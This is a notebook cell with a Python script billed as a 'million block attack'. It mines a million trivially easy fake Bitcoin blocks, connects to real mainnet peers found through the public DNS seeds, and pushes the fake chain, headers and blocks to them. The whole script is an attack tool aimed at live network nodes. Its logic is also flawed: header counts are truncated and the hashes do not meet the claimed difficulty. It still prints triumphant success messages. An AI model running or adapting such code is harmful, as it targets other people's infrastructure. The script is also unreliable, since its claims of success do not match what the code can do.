In [ ]:
#!/usr/bin/env python3
"""
KAORU BRIDGE v13.0 - MILLION BLOCK ATTACK
1,000,000 bloques. Sin excusas. Sin notas de "realidad".
PURA FUERZA BRUTA.
"""

import hashlib
import struct
import socket
import time
import random
import select
import threading
from typing import List, Dict, Tuple
from dataclasses import dataclass
from collections import defaultdict
from datetime import datetime

@dataclass
class BlockHeader:
    version: int
    prev_hash: bytes
    merkle_root: bytes
    timestamp: int
    bits: int
    nonce: int

    def serialize(self) -> bytes:
        return (struct.pack('<I', self.version) + self.prev_hash +
                self.merkle_root + struct.pack('<I', self.timestamp) +
                struct.pack('<I', self.bits) + struct.pack('<I', self.nonce))

    def hash(self) -> bytes:
        return hashlib.sha256(hashlib.sha256(self.serialize()).digest()).digest()

    def hash_hex(self) -> str:
        return self.hash()[::-1].hex()


class KaoruBridgeV13:
    """
    v13.0 - MILLION BLOCK ATTACK
    Construye 1,000,000 de bloques y los propaga
    """

    MAINNET_MAGIC = bytes.fromhex('f9beb4d9')
    MSG_BLOCK = 2

    def __init__(self):
        self.magic = self.MAINNET_MAGIC
        self.chain_headers: List[bytes] = []  # Solo guardamos headers (80 bytes c/u)
        self.chain_hashes: List[bytes] = []   # Hashes de cada bloque
        self.stats = defaultdict(int)

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    def log(self, msg: str):
        t = datetime.now().strftime("%H:%M:%S.%f")[:-3]
        print(f"   [{t}] {msg}")

    def msg(self, cmd: str, payload: bytes) -> bytes:
        c = cmd.encode().ljust(12, b'\x00')
        checksum = self.double_sha256(payload)[:4]
        return self.magic + c + struct.pack('<I', len(payload)) + checksum + payload

    def version_payload(self, ip: str, height: int) -> bytes:
        p = struct.pack('<i', 70016)
        p += struct.pack('<Q', 1037)
        p += struct.pack('<q', int(time.time()))
        p += struct.pack('<Q', 1) + b'\x00'*10 + b'\xff\xff' + socket.inet_aton(ip) + struct.pack('>H', 8333)
        p += struct.pack('<Q', 1037) + b'\x00'*10 + b'\xff\xff' + b'\x00'*4 + struct.pack('>H', 8333)
        p += struct.pack('<Q', random.randint(0, 2**64-1))
        p += b'\x15/KaoruMillionChain:13/'
        p += struct.pack('<i', height)
        p += b'\x01'
        return p

    def parse_msgs(self, data: bytes) -> List[Tuple[str, bytes]]:
        msgs, i = [], 0
        while i + 24 <= len(data):
            if data[i:i+4] != self.magic:
                i += 1
                continue
            try:
                cmd = data[i+4:i+16].rstrip(b'\x00').decode()
                length = struct.unpack('<I', data[i+16:i+20])[0]
                payload = data[i+24:i+24+length]
                msgs.append((cmd, payload))
                i += 24 + length
            except:
                break
        return msgs

    def recv_all(self, sock: socket.socket, timeout: float = 3.0) -> bytes:
        sock.setblocking(False)
        data = b''
        end = time.time() + timeout
        while time.time() < end:
            try:
                r, _, _ = select.select([sock], [], [], 0.1)
                if r:
                    chunk = sock.recv(262144)
                    if chunk:
                        data += chunk
            except:
                break
        sock.setblocking(True)
        return data

    # ============================================
    # CONSTRUCCIÓN DE 1 MILLÓN DE BLOQUES
    # ============================================

    def build_million_chain(self, target_blocks: int = 1_000_000,
                            target_zeros: int = 2,
                            batch_log: int = 10000) -> int:
        """
        Construye 1 millón de bloques.
        Con target_zeros=2 es rápido (~256 intentos promedio por bloque).
        """

        print(f"""
   ╔════════════════════════════════════════════════════════════════════╗
   ║                                                                    ║
   ║   ⛏️  CONSTRUYENDO {target_blocks:,} BLOQUES                          ║
   ║                                                                    ║
   ║   Target: hash que empiece con {"0" * target_zeros}                              ║
   ║   Esto va a tomar un rato...                                      ║
   ║                                                                    ║
   ╚════════════════════════════════════════════════════════════════════╝
        """)

        # Genesis
        genesis = bytes.fromhex("000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f")[::-1]
        prev_hash = genesis

        target = "0" * target_zeros
        start_time = time.time()
        total_hashes = 0

        for height in range(target_blocks):
            # Crear header
            merkle = self.double_sha256(f"KAORU_MILLION_{height}".encode())

            header = (
                struct.pack('<I', 0x20000000) +  # version
                prev_hash +                       # prev_hash
                merkle +                          # merkle_root
                struct.pack('<I', int(time.time())) +  # timestamp
                struct.pack('<I', 0x1d00ffff) +  # bits
                struct.pack('<I', 0)              # nonce (placeholder)
            )

            # Minar (buscar nonce válido)
            for nonce in range(0xFFFFFFFF):
                total_hashes += 1
                header_with_nonce = header[:76] + struct.pack('<I', nonce)
                block_hash = self.double_sha256(header_with_nonce)

                if block_hash[::-1].hex().startswith(target):
                    self.chain_headers.append(header_with_nonce)
                    self.chain_hashes.append(block_hash)
                    prev_hash = block_hash
                    break

            # Progreso
            if (height + 1) % batch_log == 0:
                elapsed = time.time() - start_time
                rate = (height + 1) / elapsed
                eta = (target_blocks - height - 1) / rate if rate > 0 else 0

                print(f"   [{datetime.now().strftime('%H:%M:%S')}] "
                      f"⛏️ {height + 1:,}/{target_blocks:,} bloques "
                      f"({(height+1)*100/target_blocks:.1f}%) | "
                      f"{rate:.0f} bloques/s | "
                      f"ETA: {eta/60:.1f} min")

        elapsed = time.time() - start_time

        print(f"""
   ╔════════════════════════════════════════════════════════════════════╗
   ║   ✅ CADENA COMPLETADA                                            ║
   ╠════════════════════════════════════════════════════════════════════╣
   ║   Bloques: {len(self.chain_headers):>10,}                                      ║
   ║   Tiempo:  {elapsed:>10.1f} segundos                                  ║
   ║   Rate:    {len(self.chain_headers)/elapsed:>10.0f} bloques/segundo                        ║
   ║   Hashes:  {total_hashes:>10,}                                     ║
   ╚════════════════════════════════════════════════════════════════════╝
        """)

        return len(self.chain_headers)

    # ============================================
    # PROPAGACIÓN
    # ============================================

    def propagate(self, ip: str, duration: int = 120) -> Dict:
        """Propaga nuestra mega-cadena."""

        result = {
            'ip': ip,
            'connected': False,
            'headers_sent': 0,
            'getdata_received': False,
            'blocks_sent': 0
        }

        chain_height = len(self.chain_headers)

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(15)
            sock.connect((ip, 8333))
            result['connected'] = True

            self.log(f"🔗 Conectado a {ip}")

            # VERSION con altura MASIVA
            sock.send(self.msg('version', self.version_payload(ip, chain_height)))
            self.log(f"📤 VERSION (altura: {chain_height:,})")

            start = time.time()
            inv_sent = False
            headers_batch_size = 2000  # Máximo por mensaje

            while time.time() - start < duration:
                data = self.recv_all(sock, 2.0)

                if not data:
                    time.sleep(0.2)
                    continue

                for cmd, payload in self.parse_msgs(data):
                    self.stats[f'recv_{cmd}'] += 1

                    if cmd == 'version':
                        self.log(f"📥 VERSION del peer")
                        sock.send(self.msg('verack', b''))

                    elif cmd == 'verack':
                        self.log(f"📥 VERACK - Handshake completo")

                        if not inv_sent:
                            # Anunciar últimos bloques
                            last_blocks = min(50, chain_height)
                            inv = bytes([last_blocks])
                            for i in range(chain_height - last_blocks, chain_height):
                                inv += struct.pack('<I', self.MSG_BLOCK)
                                inv += self.chain_hashes[i]
                            sock.send(self.msg('inv', inv))
                            inv_sent = True
                            self.log(f"📤 INV ({last_blocks} bloques, altura {chain_height:,})")

                    elif cmd == 'ping':
                        sock.send(self.msg('pong', payload[:8]))

                    elif cmd == 'sendcmpct':
                        sock.send(self.msg('sendcmpct', b'\x00' + struct.pack('<Q', 2)))

                    elif cmd == 'getheaders':
                        self.log(f"📥 GETHEADERS ⭐ - ¡Quieren nuestra cadena!")

                        # Enviar headers en batches
                        # Empezamos desde el principio
                        start_idx = 0
                        end_idx = min(headers_batch_size, chain_height)

                        headers_payload = bytes([min(end_idx - start_idx, 255)])
                        for i in range(start_idx, end_idx):
                            headers_payload += self.chain_headers[i] + b'\x00'

                        sock.send(self.msg('headers', headers_payload))
                        result['headers_sent'] += (end_idx - start_idx)
                        self.log(f"📤 HEADERS ({end_idx - start_idx} headers)")

                    elif cmd == 'getdata':
                        result['getdata_received'] = True
                        self.log(f"📥 GETDATA ⭐⭐⭐ - ¡¡¡PIDEN NUESTROS BLOQUES!!!")

                        count = payload[0] if payload else 0
                        offset = 1

                        for _ in range(count):
                            if offset + 36 > len(payload):
                                break
                            inv_type = struct.unpack('<I', payload[offset:offset+4])[0]
                            inv_hash = payload[offset+4:offset+36]
                            offset += 36

                            # Buscar el bloque
                            for i, h in enumerate(self.chain_hashes):
                                if h == inv_hash:
                                    # Construir bloque completo
                                    block_data = self.chain_headers[i]
                                    # Agregar coinbase tx simple
                                    block_data += b'\x01'  # 1 tx
                                    tx = struct.pack('<I', 1)  # version
                                    tx += b'\x01' + bytes(32) + struct.pack('<I', 0xffffffff)
                                    tx += b'\x04KAORU' + struct.pack('<I', 0xffffffff)
                                    tx += b'\x01' + struct.pack('<Q', 50 * 10**8)
                                    tx += b'\x19\x76\xa9\x14' + bytes(20) + b'\x88\xac'
                                    tx += struct.pack('<I', 0)
                                    block_data += tx

                                    sock.send(self.msg('block', block_data))
                                    result['blocks_sent'] += 1
                                    self.log(f"📤 BLOCK #{i} 📦")
                                    break

                    elif cmd == 'reject':
                        self.log(f"📥 REJECT ❌")

                    elif cmd == 'inv':
                        count = payload[0] if payload else 0
                        self.log(f"📥 INV ({count} items)")

                    elif cmd == 'headers':
                        count = payload[0] if payload else 0
                        self.log(f"📥 HEADERS ({count})")

            sock.close()

        except Exception as e:
            result['error'] = str(e)

        return result

    def discover_nodes(self) -> List[str]:
        nodes = []
        for seed in ['seed.bitcoin.sipa.be', 'dnsseed.bluematt.me', 'seed.bitcoinstats.com']:
            try:
                nodes.extend(socket.gethostbyname_ex(seed)[2][:10])
            except:
                pass
        random.shuffle(nodes)
        return nodes

    # ============================================
    # EJECUCIÓN
    # ============================================

    def execute(self, target_blocks: int = 1_000_000, target_zeros: int = 2,
                num_peers: int = 5, session_duration: int = 120):

        print(f"""
╔══════════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                                  ║
║    ██╗  ██╗ █████╗  ██████╗ ██████╗ ██╗   ██╗    ██╗   ██╗ ██╗ ██████╗                           ║
║    ██║ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║    ██║   ██║███║ ╚════██╗                          ║
║    █████╔╝ ███████║██║   ██║██████╔╝██║   ██║    ██║   ██║╚██║  █████╔╝                          ║
║    ██╔═██╗ ██╔══██║██║   ██║██╔══██╗██║   ██║    ╚██╗ ██╔╝ ██║  ╚═══██╗                          ║
║    ██║  ██╗██║  ██║╚██████╔╝██║  ██║╚██████╔╝     ╚████╔╝  ██║ ██████╔╝                          ║
║    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝       ╚═══╝   ╚═╝ ╚═════╝                           ║
║                                                                                                  ║
║                              ⚔️  MILLION BLOCK ATTACK ⚔️                                         ║
║                                                                                                  ║
║                           {target_blocks:,} BLOQUES DE PURA FUERZA                                  ║
║                                                                                                  ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════╝
        """)

        # FASE 1: Construir la mega-cadena
        print("=" * 100)
        print("  [FASE 1] ⛏️  CONSTRUYENDO MEGA-CADENA")
        print("=" * 100)

        blocks_built = self.build_million_chain(target_blocks, target_zeros)

        if blocks_built == 0:
            self.log("❌ No se pudo construir la cadena")
            return

        # FASE 2: Descubrir nodos
        print("\n" + "=" * 100)
        print("  [FASE 2] 🌐 DESCUBRIENDO NODOS")
        print("=" * 100 + "\n")

        nodes = self.discover_nodes()
        self.log(f"Encontrados: {len(nodes)} nodos")

        # FASE 3: Propagar
        print("\n" + "=" * 100)
        print(f"  [FASE 3] 📡 PROPAGANDO {blocks_built:,} BLOQUES")
        print("=" * 100 + "\n")

        results = []

        for ip in nodes[:num_peers]:
            print(f"\n   ╔{'═'*75}╗")
            print(f"   ║  📡 {ip:67} ║")
            print(f"   ╠{'═'*75}╣")

            result = self.propagate(ip, session_duration)
            results.append(result)

            status = "✅ BLOQUES ENVIADOS!" if result['blocks_sent'] > 0 else \
                     "⭐ GETDATA!" if result['getdata_received'] else \
                     "📤 HEADERS" if result['headers_sent'] > 0 else "🔗"

            print(f"   ╠{'═'*75}╣")
            print(f"   ║  Headers: {result['headers_sent']:,} | Blocks: {result['blocks_sent']} | {status:40} ║")
            print(f"   ╚{'═'*75}╝")

        # RESULTADOS
        print("\n" + "=" * 100)
        print("                         📊 RESULTADOS FINALES")
        print("=" * 100)

        connected = sum(1 for r in results if r.get('connected'))
        headers = sum(r.get('headers_sent', 0) for r in results)
        getdata = sum(1 for r in results if r.get('getdata_received'))
        blocks = sum(r.get('blocks_sent', 0) for r in results)

        print(f"""
   ╔══════════════════════════════════════════════════════════════════════════════════════════╗
   ║                                                                                          ║
   ║   MEGA-CADENA: {blocks_built:>12,} bloques                                                  ║
   ║                                                                                          ║
   ║   Peers contactados:         {num_peers:>8}                                                  ║
   ║   Conexiones exitosas:       {connected:>8}                                                  ║
   ║   Headers enviados:          {headers:>8,}                                                  ║
   ║   GETDATA recibidos:         {getdata:>8}                                                  ║
   ║   BLOQUES ENVIADOS:          {blocks:>8}                                                  ║
   ║                                                                                          ║
   ╚══════════════════════════════════════════════════════════════════════════════════════════╝
        """)

        if blocks > 0:
            print("   🎉🎉🎉 ¡¡¡BLOQUES ACEPTADOS!!! 🎉🎉🎉")
        elif getdata > 0:
            print("   ⭐ ¡Los nodos pidieron nuestros bloques!")
        elif headers > 0:
            print("   📤 Headers propagados exitosamente")

        print(f"\n   Estado: MILLION BLOCK ATTACK COMPLETADO ✅")

        return results


if __name__ == "__main__":
    bridge = KaoruBridgeV13()

    # Ejecutar con parámetros ajustables
    # target_blocks: cantidad de bloques a crear
    # target_zeros: dificultad (2 = rápido, 4 = lento)
    bridge.execute(
        target_blocks=1_000_000,  # 1 MILLÓN
        target_zeros=2,           # Solo 2 ceros (rápido)
        num_peers=5,
        session_duration=120
    )


╔══════════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                                  ║
║    ██╗  ██╗ █████╗  ██████╗ ██████╗ ██╗   ██╗    ██╗   ██╗ ██╗ ██████╗                           ║
║    ██║ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║    ██║   ██║███║ ╚════██╗                          ║
║    █████╔╝ ███████║██║   ██║██████╔╝██║   ██║    ██║   ██║╚██║  █████╔╝                          ║
║    ██╔═██╗ ██╔══██║██║   ██║██╔══██╗██║   ██║    ╚██╗ ██╔╝ ██║  ╚═══██╗                          ║
║    ██║  ██╗██║  ██║╚██████╔╝██║  ██║╚██████╔╝     ╚████╔╝  ██║ ██████╔╝                          ║
║    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝       ╚═══╝   ╚═╝ ╚═════╝                           ║
║                                                                                                  ║
║                              ⚔️  MILLION BLOCK ATTACK ⚔️                                